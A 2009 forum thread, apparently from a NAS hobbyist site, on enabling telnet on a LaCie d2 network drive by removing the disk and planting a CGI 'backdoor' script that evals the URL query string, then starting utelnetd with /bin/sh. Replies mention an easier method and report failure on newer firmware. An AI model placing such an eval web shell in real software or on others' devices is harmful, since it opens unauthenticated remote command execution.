How to enable telnet for the LaCie d2 network

Post Reply
SuperPoney
Posts: 7
Joined: Mon Jun 01, 2009 11:53 am

How to enable telnet for the LaCie d2 network

Post by SuperPoney » Wed Jun 03, 2009 7:21 pm

Hi to nas-central readers.
Here is a small howto in order to add a telnet access to the "d2 network" (Here is the specs of the LaCie's D2 network.).

Note: this howto should work also for other LaCie's network family product.
[*] Big disk network (not confirmed)
[*] 2 Big network (not confirmed)
[*] 5 Big network (not confirmed)

Image
("network" family products).

Note: I've done this howto with my NAS opened (which void the warranty). But you should take a close look at belese's post : add ssh without dissambling (in the "Network Space" section of this forum).

[*] Make a backup of you're disk using a unix live CD (ie: knoppix) and the dd command.
Browse this forum if you don't know how to do this.
For the moment dd images of the d2 network are not in the nas-central repository, I'll upload mine when I've some spare time.

[*] Open you're NAS and get the hard drive (!!! THIS WILL REMOVE YOUR WARRANTY !!!):
ImageImage
ImageImage
ImageImage
ImageImage

It's easy to avoid breaking the warranty seal. This is just a sticker on one of the 4 rear screws. So do not unscrew the one with the sticker and rotate the rear part to get the disk.

[*] Downoad the telnet deamon has explained by Jimmy in his his blog : http://downloads.nas-central.org/Upload ... s/utelnetd

[*] Create a backdoor script :
#!/bin/sh

echo "Content-type: text/plain"
echo ""
echo $QUERY_STRING | sed s/"%20"/" "/
eval `echo "$QUERY_STRING" | sed s/"%20"/" "/`
I've called mine "exploit.cgi".
The "sed" command replace "%20" characters send by your web browser by spaces. Thus allow us to use command with spaces (like "ls -lsa").

[*] Put the utelned and exploit.cgi files in a drive readable from the live cd (usb key, primary HDD...).

[*] Launch you're Live CD with the disk plugged in your PC and browse to the sdX8 partition (the one with the "www" folder). For my config the disk was sda8 (if you've plug your hard drive in second this can be sdb8).

Code: Select all

mkdir /mnt/sda8
mount /dev/sda8 /mnt/sda8 -text3
cd mnt/sda8/www/cgi-bin/public
Copy the utelnetd and exploit file in the www public folder, and make them executable :

Code: Select all

cp <my_source>/utelnetd /mnt/sda8/www/cgi-bin/public/
cp <my_source>/exploit.cgi /mnt/sda8/www/cgi-bin/public/
chmod +x utelnetd
chmod +x exploit.cgi
Note: You're exploit.cgi file is not in DOS format ?

Code: Select all

cat exploit.cgi
You shouldn't have "^M" at the end of each lines.

[*] Shut down you're computer, place the d2 disk in his box. Start the D2, start your web browser and enter the following url :

Image
(replace "cerise" by your d2 IP)

If the content of the www public folder is displayed then your backdoor is working (also try "ls -lsa" to see if the sed command works).


[*] If the backdoor works you can launch the telnet deamon :
http://<your d2 ip>/cgi-bin/public/exploit.cgi?utelnetd -l /bin/sh

[*] now you can telnet your d2 !
Image

Happy hacking !
SuperPoney

malc0mn
Posts: 5
Joined: Sun Jun 20, 2010 6:15 am

Re: How to enable telnet for the LaCie d2 network

Post by malc0mn » Sun Jun 20, 2010 6:40 am

For a really easy 2Big Network hack without opening the box see here: viewtopic.php?f=156&t=676&p=6441#p6441

polomora
Posts: 4
Joined: Wed Nov 07, 2012 6:02 pm

Re: How to enable telnet for the LaCie d2 network

Post by polomora » Sun Nov 11, 2012 3:12 pm

It doesn't work. I followed the instructions to the letter, and I couldn't get the backdoor to work.

I think that Lacie have disabled the method in their latest firmware.

Post Reply